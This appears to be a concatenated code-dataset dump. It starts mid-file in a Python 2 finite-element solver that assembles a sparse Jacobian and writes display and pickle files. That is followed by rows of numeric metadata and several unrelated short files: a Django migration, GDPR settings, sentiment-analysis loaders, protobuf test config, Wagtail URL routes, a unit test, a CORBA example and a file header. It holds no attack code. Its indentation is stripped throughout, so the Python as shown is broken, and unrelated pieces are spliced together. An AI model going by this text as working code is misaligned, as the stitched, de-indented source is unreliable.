if nb[v]:
dA = numpy.zeros((nb[v]*order[v],ni))
for i in range(0,nb[v]):
for j in range(0,ni):
for k in range(0,order[v]):
dA[k+i*order[v],j] = basis(
numpy.array(face[f].centre[0]),
numpy.array(face[f].centre[1]),
face[f],face_taylor[j],
[ sum(temp) for temp in zip([0,k],boundary[b[v][i]].condition) ])
dB = numpy.zeros((nb[v]*order[v],nb[v]))
for i in range(0,nb[v]): dB[i*order[v],i] = 1.0
A = numpy.append( A , dA , axis=0 )
B = numpy.append( numpy.append( B , numpy.zeros((B.shape[0],nb[v])) , axis=1 ) ,
numpy.append( numpy.zeros((nb[v]*order[v],B.shape[1])) , dB , axis=1 ) ,
axis=0 )
# solve interpolation problem
D = numpy.linalg.solve(A,B)
# interpolated values
F = numpy.zeros((ng,ni))
face[f].Q[v] = numpy.zeros((np[v],ng,D.shape[1]))
for j in range(0,np[v]):
for k in range(0,ni):
F[:,k] = basis(y[:,0],y[:,1],face[f],face_taylor[k],taylor_powers[j])
face[f].Q[v][j] = numpy.dot( F , D )
# transform differentials to x and y
T = derivative_transform_matrix(numpy.linalg.inv(R),order[v])
for j in range(0,ng): face[f].Q[v][:,j] = numpy.dot( T , face[f].Q[v][:,j] )
#------------------------------------------------------------------------------#
def initialise_unknowns():
ne = len(element)
np = [ len(x) for x in element[0].unknown ]
nv = len(order)
max_order = max(order)
max_order_sq = max_order*max_order
max_np = max(np)
for e in range(0,ne):
x = element[e].centre
delta = numpy.linspace(-0.1*element[e].size/2,0.1*element[e].size/2,max_order)
dx = [ temp.flatten() for temp in nodegrid(delta,delta) ]
p = [ taylor_powers[0:max_np,i] for i in range(0,2) ]
M = ((numpy.ones((max_np,1)) * dx[0]).T ** (numpy.ones((max_order_sq,1)) * p[0]) *
(numpy.ones((max_np,1)) * dx[1]).T ** (numpy.ones((max_order_sq,1)) * p[1]) *
(numpy.ones((max_order_sq,1)) * (scipy.misc.comb(p[0]+p[1],p[0])/scipy.misc.factorial(p[0]+p[1]))))
inv_M = numpy.linalg.pinv(M)
inv_V = numpy.linalg.inv(element[e].V)
for v in range(0,nv):
u[element[e].unknown[v]] = dot_sequence( inv_V , inv_M , initial[v](dx[0]+x[0],dx[1]+x[1]) )[0:np[v]]
#------------------------------------------------------------------------------#
def generate_system():
ne = len(element)
ng = len(gauss_weights)
nh = len(hammer_weights)
np = [ len(x) for x in element[0].unknown ]
nt = len(term)
nv = len(order)
max_np = max(np)
sum_np = sum(np)
sum_np_sq = sum_np*sum_np
# local dense jacobian
L = Struct(i=[],x=[])
# csr system jacobian
J = Struct(p=[],i=[],x=[])
J.p = numpy.zeros(u.shape[0]+1,dtype=int)
for e in range(0,ne):
temp = sum_np
for f in element[e].face: temp += sum_np*(len(face[f].border) == 2)
J.p[numpy.array(sum(element[e].unknown,[]))+1] = temp
J.p = numpy.cumsum(J.p)
J.i = numpy.zeros(J.p[-1],dtype=int)
J.x = numpy.zeros(J.p[-1])
# function vector
F = numpy.zeros(u.shape)
for e in range(0,ne):
# number of faces
nf = len(element[e].face)
# adjacent elements
adj = - numpy.ones(nf,dtype=int)
for i in range(0,nf):
temp = numpy.array(face[element[e].face[i]].border)
temp = temp[temp != e]
if len(temp): adj[i] = temp[0]
n_adj = sum(adj >= 0)
i_adj = numpy.arange(0,nf)[adj >= 0]
# local matrices to add to the system
L.i = numpy.zeros((sum_np,(1+n_adj)*sum_np),dtype=int)
L.i[:,0:sum_np] = numpy.tile( sum(element[e].unknown,[]) , (sum_np,1) )
for i in range(0,n_adj): L.i[:,(i+1)*sum_np:(i+2)*sum_np] = numpy.tile( sum(element[adj[i_adj[i]]].unknown,[]) , (sum_np,1) )
L.x = numpy.zeros(L.i.shape)
# indices into the local matrices
index_e = [ numpy.arange(sum(np[:v]),sum(np[:v+1]))[numpy.newaxis] for v in range(0,nv) ]
index_a = [ [] for i in range(0,nf) ]
for i in range(0,n_adj):
index_a[i_adj[i]] = [ numpy.array([
range(sum(np[:v]),sum(np[:v+1])) +
range((i+1)*sum_np+sum(np[:v]),(i+1)*sum_np+sum(np[:v+1])) ])
for v in range(0,nv) ]
# loop over terms
for t in range(0,nt):
# numbers of variables in the term product sequence
ns = len(term[t].variable)
# direction index
direction = powers_taylor[int(term[t].direction == 'x'),int(term[t].direction == 'y')]
# powers
P = numpy.array(term[t].power)[numpy.newaxis].T
# equation matrix
A = - term[t].constant * dot_sequence( element[e].P[direction][:,0:np[term[t].equation]].T , numpy.diag(element[e].W) )
# calculate the coefficients and values
B = [ [] for s in range(0,ns) ]
X = numpy.zeros((ns,nh))
for s,v in zip(range(0,ns),term[t].variable):
B[s] = element[e].P[powers_taylor[term[t].differential[s]]][:,0:np[v]]
X[s,:] = numpy.dot( B[s] , u[element[e].unknown[v]] )
# add to the local jacobian
Y = X ** P
for s,v in zip(range(0,ns),term[t].variable):
temp = numpy.copy(Y)
temp[s,:] = P[s] * X[s,:] ** (P[s]-1)
L.x[index_e[term[t].equation].T,index_e[v]] += dot_sequence( A , numpy.diag(numpy.prod(temp,axis=0)) , B[s] )
# add to the function vector
F[element[e].unknown[term[t].equation]] += numpy.dot( A , numpy.prod(Y,axis=0) )
# continue if not a flux term
if term[t].direction != 'x' and term[t].direction != 'y': continue
# face components
for i in range(0,nf):
f = element[e].face[i]
a = adj[i]
b = numpy.array(face[f].boundary,dtype=object)
# face normal
normal = element[e].orientation[i] * numpy.array(face[f].normal)
# corresponding face index
if a >= 0: j = numpy.arange(0,len(element[a].face))[numpy.array(element[a].face) == f]
# wind
if a >= 0 and ('u' in term[t].method):
ui = [ dot_sequence( gauss_weights , element[e].Q[i][:,0:np[v]] , u[element[e].unknown[v]] ) for v in range(0,nv) ]
uo = [ dot_sequence( gauss_weights , element[a].Q[j][:,0:np[v]] , u[element[a].unknown[v]] ) for v in range(0,nv) ]
w = wind( normal , ui , uo )
else:
w = True
# equation matrix
A = normal[term[t].direction == 'y'] * term[t].constant * dot_sequence(
element[e].Q[i][:,0:np[term[t].equation]].T , numpy.diag(0.5*gauss_weights) )
# calculate the coefficients and values
B = [ [] for s in range(0,ns) ]
X = numpy.zeros((ns,ng))
for s,v in zip(range(0,ns),term[t].variable):
# where there is an adjacent element
if a >= 0:
# interpolated flux
if term[t].method[s] == 'i' or len(b[v]):
if face[f].border[0] == e: temp = numpy.array(range(0,2*np[v]))
else: temp = numpy.array(range(np[v],2*np[v])+range(0,np[v]))
B[s] = face[f].Q[v][powers_taylor[term[t].differential[s]]][:,temp]
# averaged flux
elif term[t].method[s] == 'a':
B[s] = 0.5*numpy.append(element[e].Q[i][:,0:np[v]],element[a].Q[j][:,0:np[v]],axis=1)
# upwind flux
elif term[t].method[s] == 'u':
B[s] = numpy.zeros((ng,2*np[v]))
if w: B[s][:,0:np[v]] += element[e].Q[i][:,0:np[v]]
else: B[s][:,np[v]:2*np[v]] += element[a].Q[j][:,0:np[v]]
# values
X[s,:] = numpy.dot( B[s] , numpy.append(u[element[e].unknown[v]],u[element[a].unknown[v]]) )
# interpolated flux where there is no adjacent element
else:
B[s] = face[f].Q[v][powers_taylor[term[t].differential[s]]][:,0:np[v]]
X[s,:] = numpy.dot( B[s] , u[element[e].unknown[v]] )
# interpolated flux at boundaries
if len(b[v]):
for k in range(0,len(b[v])):
X[s,:] += boundary[b[v][k]].value * face[f].Q[v][powers_taylor[term[t].differential[s]]][:,(1+(a>=0))*np[v]+k]
# add to the local jacobian
Y = X ** P
for s,v in zip(range(0,ns),term[t].variable):
temp = numpy.copy(Y)
temp[s,:] = P[s] * X[s,:] ** (P[s]-1)
L.x[index_e[term[t].equation].T,index_a[i][v] if a >= 0 else index_e[v]] += dot_sequence(
A , numpy.diag(numpy.prod(temp,axis=0)) , B[s] )
# add to the function vector
F[element[e].unknown[term[t].equation]] += numpy.dot( A , numpy.prod(Y,axis=0) )
# add dense local jacobian to csr global jacobian
index = sum( nodegrid( J.p[sum(element[e].unknown,[])] , numpy.arange(0,L.i.shape[1]) ) ).flatten()
J.i[index] = L.i.flatten()
J.x[index] = L.x.flatten()
# return the global system
return [ scipy.sparse.csr_matrix((J.x,J.i,J.p)) , F ]
#------------------------------------------------------------------------------#
def write_display_file(display_filename,n):
nv = len(order)
np = numpy.array([ len(x) for x in element[0].unknown ])
Q = numpy.linalg.inv(numpy.array([[1,-1,-1,1],[1,1,-1,-1],[1,1,1,1],[1,-1,1,-1]]))
file = open(display_filename,'w')
for e in range(0,len(element)):
s,t = element_sequential_indices(e,element,face)
for i in range(0,len(element[e].face)):
quad = numpy.array( [ element[e].centre ,
face[element[e].face[s[i-1]]].centre ,
node[face[element[e].face[s[i]]].node[t[i]]].x ,
face[element[e].face[s[i]]].centre ] )
a = numpy.dot(Q,quad)
mesh = numpy.append( numpy.mgrid[0:n+1,0:n+1]*(2.0/n)-1.0 , numpy.zeros((nv,n+1,n+1)) , axis=0 )
mesh[0:2] = [ a[0,j] + a[1,j]*mesh[0] + a[2,j]*mesh[1] + a[3,j]*mesh[0]*mesh[1] for j in range(0,2) ]
for j in range(0,max(np)):
phi = basis(mesh[0],mesh[1],element[e],j,[0,0])
for v in numpy.arange(0,nv)[j < np]:
mesh[2+v] += u[element[e].unknown[v][j]]*phi
file.write( '\n\n'.join([ '\n'.join([ ' '.join(['%e']*(2+nv)) % tuple(mesh[:,i,j]) for j in range(0,n+1) ]) for i in range(0,n+1) ]) + '\n\n\n' )
file.close()
#------------------------------------------------------------------------------#
def write_data_file(data_filename):
file = open(data_filename,'wb')
pickle.dump({'node':node,'face':face,'element':element,'boundary':boundary,'order':order,'u':u},file,protocol=pickle.HIGHEST_PROTOCOL)
file.close()
################################################################################
path = sys.argv[1]
action = sys.argv[2].lower()
directory = os.path.dirname(path)
name = os.path.basename(path)
input_filename = directory + os.sep + name + '.input'
data_filename = directory + os.sep + name + '.data'
display_filename = directory + os.sep + name + '.display'
do = Struct(pre = 'p' in action , re = 'r' in action , init = 'i' in action , solve = 's' in action , display = 'd' in action )
#------------------------------------------------------------------------------#
if not do.pre:
with Timer('reading data from "%s"' % data_filename):
node,face,element,boundary,u,order = read_data_file(data_filename)
with Timer('reading input from "%s"' % input_filename):
input_data = read_input_file(input_filename)
if do.pre:
geometry_filename = directory + os.sep + input_data[0]
order = input_data[1]
if do.pre or do.re:
boundary = input_data[2]
if do.init:
initial = input_data[3]
if do.solve:
for i in range(0,len(boundary)): boundary[i].value = input_data[2][i].value
term = input_data[4]
wind = input_data[5]
iterations = input_data[6]
if do.display:
mesh_size = input_data[7]
with Timer('generating constants'):
(gauss_locations,gauss_weights,
hammer_locations,hammer_weights,
taylor_coefficients,taylor_powers,powers_taylor,
factorial) = generate_constants(order)
if do.pre:
with Timer('reading and processing geometry from "%s"' % geometry_filename):
node,face,element = read_geometry(geometry_filename)
with Timer('generating unknowns'):
u = generate_unknowns()
if do.pre or do.re:
with Timer('assigning boundaries to faces'):
assign_boundaries()
with Timer('calculating element matrices'):
calculate_element_matrices()
if do.init:
with Timer('initialising the unknowns'):
initialise_unknowns()
if do.solve:
with Timer('iterating',True):
index = [ numpy.zeros(u.shape,dtype=bool) for v in range(0,len(order)) ]
for e in range(0,len(element)):
for v in range(0,len(order)):
index[v][element[e].unknown[v]] = True
for i in range(0,iterations):
J,f = generate_system()
print ' ' + ' '.join([ '%.4e' % numpy.max(numpy.abs(f[i])) for i in index ])
u += scipy.sparse.linalg.spsolve(J,-f)
if do.display:
with Timer('saving display to "%s"' % display_filename):
write_display_file(display_filename,mesh_size)
if do.pre or do.re or do.init or do.solve:
with Timer('saving data to "%s"' % data_filename):
write_data_file(data_filename)
################################################################################
| 34.35 | 173 | 0.597982 | 4,825 | 29,541 | 3.605596 | 0.075855 | 0.033799 | 0.040927 | 0.018336 | 0.445824 | 0.348163 | 0.281773 | 0.200494 | 0.157901 | 0.140541 | 0 | 0.076295 | 0.157882 | 29,541 | 859 | 174 | 34.389988 | 0.623025 | 0.141194 | 0 | 0.203704 | 0 | 0 | 0.024306 | 0.000845 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.016667 | null | null | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
497d558f6807d6cee34934135fc08d3e5e24fbf5 | 487 | py | Python | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | server/apps/api/notice/migrations/0003_alter_event_priority.py | NikitaGrishchenko/csp-tender-hack-server | 56055f51bf472f0f1e56b419a48d993cc91e0f3a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-27 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notice', '0002_auto_20211127_0236'),
]
operations = [
migrations.AlterField(
model_name='event',
name='priority',
field=models.IntegerField(choices=[(1, 'Низкий приоритет'), (2, 'Средний приоритет'), (3, 'Высокий приоритет')], verbose_name='Приоритет'),
),
]
| 25.631579 | 151 | 0.616016 | 52 | 487 | 5.673077 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092643 | 0.246407 | 487 | 18 | 152 | 27.055556 | 0.711172 | 0.092402 | 0 | 0 | 1 | 0 | 0.229545 | 0.052273 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
497e1c5d29374050c770b786c91bc5c1ccabcd85 | 650 | py | Python | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | gdpr_assist/app_settings.py | mserrano07/django-gdpr-assist | 3c23d0aadadc676c128ef57aebc36570f3936ff1 | [
"BSD-3-Clause"
] | null | null | null | """
Settings
"""
from yaa_settings import AppSettings
class PrivacySettings(AppSettings):
# Name of the model attribute for a privacy definition
GDPR_PRIVACY_CLASS_NAME = "PrivacyMeta"
# Name of the model attribute for the privacy definition instance
GDPR_PRIVACY_INSTANCE_NAME = "_privacy_meta"
# Internal name for the GDPR log database
GDPR_LOG_DATABASE_NAME = "gdpr_log"
# Whether to write to log database during anonymisation.
GDPR_LOG_ON_ANONYMISE = True
# Disable anonymise_db command by default - we don't want people running it
# on production by accident
GDPR_CAN_ANONYMISE_DATABASE = False
| 28.26087 | 79 | 0.755385 | 87 | 650 | 5.413793 | 0.54023 | 0.059448 | 0.038217 | 0.059448 | 0.110403 | 0.110403 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 650 | 22 | 80 | 29.545455 | 0.905769 | 0.493846 | 0 | 0 | 0 | 0 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
49850af7a6ca8eea66c58c865c235297d9610189 | 2,815 | py | Python | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | null | null | null | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | 2 | 2020-09-25T21:17:58.000Z | 2022-02-10T00:28:19.000Z | senti_analysis/data.py | hotbaby/sentiment-analysis | efb880870d905c4c02528d7d242ba06b90f0e259 | [
"MIT"
] | null | null | null | # encoding: utf8
import numpy as np
import pandas as pd
from collections import OrderedDict
from senti_analysis import config
from senti_analysis import constants
from senti_analysis.preprocess import (load_tokenizer, load_sentences,
encode_sentence, label_transform)
def load_data_set():
"""
Load data set.
:return: train_data_set, validation_data_set, test_data_set
"""
train_data_set = pd.read_csv(config.TRAIN_SET_PATH)
validation_data_set = pd.read_csv(config.VALIDATION_SET_PATH)
test_data_set = pd.read_csv(config.TEST_SET_PATH)
return train_data_set, validation_data_set, test_data_set
def x_data():
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_train = encode_sentence(train_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
return x_train, x_val
def load_val_data_set():
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_val = encode_sentence(val_sentences, padding=True, max_length=config.MAX_SEQUENCE_LENGTH,
tokenizer=tokenizer)
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
_, y_val = transform_y_data(train_set, val_set, constants.COLS)
return x_val, y_val
def transform_y_data(train_set, val_set, cols):
y_train = OrderedDict()
y_val = OrderedDict()
for col in cols:
y_train[col] = np.array(label_transform(train_set[col]))
y_val[col] = np.array(label_transform(val_set[col]))
return y_train, y_val
def y_data():
"""
generate y label data.
:return: train_label_data dict, validation_label_data dict
"""
train_set = pd.read_csv(config.TRAIN_SET_PATH)
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
y_train, y_val = transform_y_data(train_set, val_set, constants.COLS)
return y_train, y_val
def validate_data():
val_set = pd.read_csv(config.VALIDATION_SET_PATH)
tokenizer = load_tokenizer()
train_sentences, val_sentences, test_sentences = load_sentences()
x_val = encode_sentence(val_sentences, padding=True,
max_length=config.MAX_SEQUENCE_LENGTH, tokenizer=tokenizer)
y_val = {}
for col in constants.COLS:
y_val[col] = np.array(label_transform(val_set[col]))
return x_val, y_val
| 30.597826 | 99 | 0.713677 | 395 | 2,815 | 4.693671 | 0.124051 | 0.045307 | 0.053398 | 0.071197 | 0.717907 | 0.696332 | 0.666127 | 0.651025 | 0.615965 | 0.615965 | 0 | 0.000446 | 0.204263 | 2,815 | 91 | 100 | 30.934066 | 0.827232 | 0.061101 | 0 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49882b0d53f39e7e8ebf679902e5c955c3e1b55f | 944 | py | Python | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 708 | 2019-10-11T06:23:40.000Z | 2022-03-31T09:39:08.000Z | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 302 | 2019-11-11T22:09:21.000Z | 2022-03-29T11:21:04.000Z | tests/inputs/config.py | hsh-nids/python-betterproto | f5d3b48b1aa49fd64513907ed70124b32758ad3e | [
"MIT"
] | 122 | 2019-12-04T16:22:53.000Z | 2022-03-20T09:31:10.000Z | # Test cases that are expected to fail, e.g. unimplemented features or bug-fixes.
# Remove from list when fixed.
xfail = {
"namespace_keywords", # 70
"googletypes_struct", # 9
"googletypes_value", # 9
"import_capitalized_package",
"example", # This is the example in the readme. Not a test.
}
services = {
"googletypes_response",
"googletypes_response_embedded",
"service",
"service_separate_packages",
"import_service_input_message",
"googletypes_service_returns_empty",
"googletypes_service_returns_googletype",
"example_service",
"empty_service",
}
# Indicate json sample messages to skip when testing that json (de)serialization
# is symmetrical becuase some cases legitimately are not symmetrical.
# Each key references the name of the test scenario and the values in the tuple
# Are the names of the json files.
non_symmetrical_json = {"empty_repeated": ("empty_repeated",)}
| 32.551724 | 81 | 0.733051 | 119 | 944 | 5.605042 | 0.621849 | 0.014993 | 0.074963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005175 | 0.181144 | 944 | 28 | 82 | 33.714286 | 0.857697 | 0.444915 | 0 | 0 | 0 | 0 | 0.62768 | 0.348928 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4989cd340b09d2674ba44f9caf4ca76681a1034f | 1,476 | py | Python | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | examples/wagsley/wagsley/urls.py | Blogsley/blogsley | 0ca17397af5d53c2fac3affb5eacec2f8d941d37 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.urls import include, path, re_path
from django.contrib import admin
from ariadne_django.views import GraphQLView
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtail.documents import urls as wagtaildocs_urls
from puput import urls as puput_urls
from search import views as search_views
from wagsley.schema import schema
print(schema)
urlpatterns = [
path('django-admin/', admin.site.urls),
path('admin/', include(wagtailadmin_urls)),
path('documents/', include(wagtaildocs_urls)),
#path('search/', search_views.search, name='search'),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns = urlpatterns + [
path('graphql/', GraphQLView.as_view(schema=schema), name='graphql'),
path('accounts/', include('accounts.urls')),
path('accounts/', include('django.contrib.auth.urls')),
path('accounts/', include('allauth.urls')),
path('events/', include('events.urls')),
re_path(r'^comments/', include('django_comments_xtd.urls')),
path("", include(puput_urls)),
path("", include(wagtail_urls)),
path('', include('home.urls')),
] | 28.941176 | 80 | 0.735095 | 186 | 1,476 | 5.72043 | 0.274194 | 0.067669 | 0.045113 | 0.043233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 1,476 | 51 | 81 | 28.941176 | 0.837136 | 0.071138 | 0 | 0 | 0 | 0 | 0.132117 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4989d46fdda2f05efd221caf77a2291b849c31f5 | 1,311 | py | Python | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | null | null | null | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | 311 | 2017-09-14T22:34:21.000Z | 2022-03-27T18:30:17.000Z | tests/unit/core/test_certify_timestamp.py | sys-git/certifiable | a3c33c0d4f3ac2c53be9eded3fae633fa5f697f8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `certifiable.core.certify_timestamp` method."""
import datetime
import unittest
from decimal import Decimal
from certifiable import CertifierTypeError
from certifiable.core import certify_timestamp
class CoreCertifyTimestampTestCase(unittest.TestCase):
"""Tests for `certifiable.core.certify_timestamp` method."""
def setUp(self):
"""Set up test fixtures, if any."""
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_timestamp(self):
for i in [
datetime.datetime.utcnow(),
]:
self.assertIs(
certify_timestamp(
i,
required=True,
),
i,
)
def test_not_timestamp(self):
from tests import TestEnum1
for i in [
0,
True,
False,
3.4,
5L,
complex(6, 7),
Decimal(8),
datetime.date(2017, 11, 1),
TestEnum1.X,
]:
self.assertRaises(
CertifierTypeError,
certify_timestamp,
i,
required=True,
)
if __name__ == '__main__':
unittest.main()
| 22.220339 | 64 | 0.514111 | 122 | 1,311 | 5.393443 | 0.483607 | 0.121581 | 0.057751 | 0.069909 | 0.285714 | 0.136778 | 0.136778 | 0 | 0 | 0 | 0 | 0.021223 | 0.389016 | 1,311 | 58 | 65 | 22.603448 | 0.80025 | 0.032037 | 0 | 0.225 | 0 | 0 | 0.007449 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | null | null | 0 | 0.15 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
498b4c183ee96795b8b620014ec7c0080e178c36 | 1,477 | py | Python | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | rtc_handle_example/replace/com_replace_impl.py | takashi-suehiro/rtmtools | 56ee92d3b3f2ea73d7fa78dfabe6a098e06f6215 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- Python -*-
"""
\file com_replace_idl_examplefile.py
\brief Python example implementations generated from com_replace.idl
\date $Date$
"""
import omniORB
from omniORB import CORBA, PortableServer
import _GlobalIDL, _GlobalIDL__POA
class ComReplace_i (_GlobalIDL__POA.ComReplace):
"""
\class ComReplace_i
Example class implementing IDL interface ComReplace
"""
def __init__(self, repl_rtc):
"""
\brief standard constructor
Initialise member variables here
"""
self.rtc=repl_rtc
# int count_of_replaced_substring()
def replace_count(self):
#raise CORBA.NO_IMPLEMENT(0, CORBA.COMPLETED_NO)
# *** Implement me
# Must return: result
return self.rtc.repl_count
if __name__ == "__main__":
import sys
# Initialise the ORB
orb = CORBA.ORB_init(sys.argv)
# As an example, we activate an object in the Root POA
poa = orb.resolve_initial_references("RootPOA")
# Create an instance of a servant class
servant = ComReplace_i()
# Activate it in the Root POA
poa.activate_object(servant)
# Get the object reference to the object
objref = servant._this()
# Print a stringified IOR for it
print( orb.object_to_string(objref))
# Activate the Root POA's manager
poa._get_the_POAManager().activate()
# Run the ORB, blocking this thread
orb.run()
| 22.723077 | 69 | 0.666892 | 186 | 1,477 | 5.053763 | 0.505376 | 0.035106 | 0.031915 | 0.025532 | 0.031915 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001792 | 0.244414 | 1,477 | 64 | 70 | 23.078125 | 0.840502 | 0.47258 | 0 | 0 | 1 | 0 | 0.02149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0.055556 | 0.444444 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
498efc2d71a44fd1bc6d2b0987f9eff5df4001b1 | 1,192 | py | Python | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 16 | 2019-08-13T18:49:14.000Z | 2022-01-11T15:41:12.000Z | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 24 | 2019-09-11T14:48:01.000Z | 2022-03-18T08:17:52.000Z | src/pytornado/_util.py | airinnova/pytornado | 6127f45af60ab05f15b441bc134089a7e7a59669 | [
"Linux-OpenIB"
] | 5 | 2019-09-20T18:45:45.000Z | 2020-12-08T01:44:43.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
